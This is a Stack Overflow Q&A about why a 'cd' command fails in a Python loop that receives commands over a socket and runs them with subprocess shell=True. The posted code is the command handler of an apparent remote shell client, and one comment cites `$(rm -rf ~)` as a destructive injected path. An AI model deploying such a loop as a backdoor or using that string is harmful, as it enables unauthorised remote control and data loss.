# Python os.chdir() with os.getcwd() not working

Tags: python

```
def receive_commands():
    global s
    while True:
        data = s.recv(1024)
        if data[:2].decode("utf-8") == 'cd':
            #print(str(os.getcwd()) + char + data[3:].decode("utf-8"))
            os.chdir(str(os.getcwd()) + char + data[3:].decode("utf-8"))
            s.send(str.encode(os.getcwd()))
        if len(data) > 0:
            cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            output_bytes = cmd.stdout.read() + cmd.stderr.read()
            output_str = str(output_bytes, "utf-8")
            #s.send(str.encode(output_str + str(os.getcwd()) + '> '))
            s.send(str.encode(output_str))
            print(output_str)
    s.close()
```

The problem is with `os.chdir(str(os.getcwd()) + char + data[3:].decode("utf-8"))`. In my case I have a folder: `/root/Desktop/Everything`. When `os.getcwd()` is `/root/Desktop` and char is `/` and `data[3:].decode("utf-8")` is `Everything` the command `os.chdir(str(os.getcwd()) + char + data[3:].decode("utf-8"))` doesn't work and throws the error: `/bin/sh: 1: cd: can't cd to Everything`. I don't understand considering `os.chdir(str(os.getcwd()) + char + data[3:].decode("utf-8"))` is equivalent to `os.chdir('/root/Desktop/Everything')`.

Using python 3 on Kali linux.

Comment: Does the directory exist?

Comment: Doing development as root? tsk, tsk. (Or if you *aren't*, that explains a permission issue accessing `/root/Desktop/Everything`).

Comment: @PeterWood yes the directory exists

Comment: You should use [**`os.path.join`**](https://docs.python.org/3/library/os.path.html#os.path.join) to join path sub-parts

Comment: Are you sure `data[3:].decode("utf-8")` doesn't have any hidden characters or the like?

Comment: @CharlesDuffy I code in root to make sure there arent any permission issues

Comment: *nod* -- `print(repr(output_str))` is much more conclusive than `print(output_str)`.

Comment: Doing development as root doesn't "ensure there aren't any permissions issues" -- it *creates* permission issues, since any files you create while logged in as root can't be accessed by any other user.

Comment: @rlee827 yes, i used a print statement to print what it was and it was exactly what i wanted

Comment: But `print(x)` *doesn't* tell you if `x` has nonprintable characters (because they, well, *aren't printable*); you need `print(repr(x))` for that, which creates a printable textual description.

Comment: @CharlesDuffy even so, the error msg doesnt include any other characters it only says 'Everything'

Comment: You shouldn't need to call `getcwd` because `chdir` assumes the path given is relative to the current working directory if it isn't a full path.

Comment: Waitaminute -- `os.chdir()` doesn't run `/bin/sh` at all. I strongly suspect that you're making a faulty assumption about which code is throwing an error. It's the `subprocess.Popen()` line that would create this error, not the `os.chdir()` line.

Comment: BTW, you do realize that `subprocess.Popen('cd anything', shell=True)` is useless, because the `cd` only changes the directory of the subprocess, and *not* the Python interpreter that called it? (It's also insecure if your directory name comes from an untrusted source -- someone tells your code to go to a directory named `$(rm -rf ~)` and you're in a world of hurt).

Comment: I suspect the issue actually lies an OS-level mechanism, possibly SELinux?. If you launch a new `/bin/sh` shell, can you `cd /root/Desktop/Everything`? If you get the same error there, you can rule out all of your Python code. More generally: Kali Linux is notorious for doing completely nonstandard things, which makes it a terrible platform to develop new code on if you are not already a Linux expert.

Comment: @CharlesDuffy Its not useless, this isnt the full code, it has a purpose.

Comment: @Elijah, no, I mean, it's literally useless (except as a really inefficient way for testing whether a directory exists). No matter how many other lines of code you add, the `subprocess.Popen('cd anything')` command won't change anything about how those other lines operate / what directory they're run in / what they do.

Comment: @DanielPryden Yes it works

Comment: @CharlesDuffy Its for other commands, but maybe that is the problem. Maybe if i put the 'cd' if statement into that one so subprocess isnt trying to change a directory

Comment: Wait.... if the subprocess is being launched with a cwd of `/root/Desktop/Everything`, then why is it trying to `cd Everything`? Do you have a folder at `/root/Desktop/Everything/Everything`?

Comment: @CharlesDuffy Ahh that did work. Thanks for giving me the idea.

Comment: @Elijah: A child process can't change a parent's environment at all, including working directory. So any command that involves `cd` will have its effects limited to that one subprocess, and won't affect the parent process or other subprocesses you launch at all.

Comment: @DanielPryden Im aware, I didnt notice that at first but CharlesDuffy lead me to figure it out

Answer (score 0):

subprocess was also attempting to change directories, so I integrated the 'cd' if statement into the other one to fix it.